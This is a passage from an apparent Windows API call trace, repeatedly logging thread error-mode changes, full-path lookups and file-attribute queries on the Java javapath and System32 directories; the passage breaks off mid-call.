[0139.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.894] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.895] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.895] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.896] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.896] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0139.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.896] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0139.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.896] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.897] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.898] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.898] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.899] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.899] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.899] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.900] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.900] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.901] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.901] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.902] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.903] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.904] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.904] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0139.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.905] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e0a0 | out: lpFileInformation=0xb156f8e0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfc0) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df80) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e010) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e010) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dfb0) returned 1 [0139.907] SetThreadErrorMode (dwNewMode=0x1, 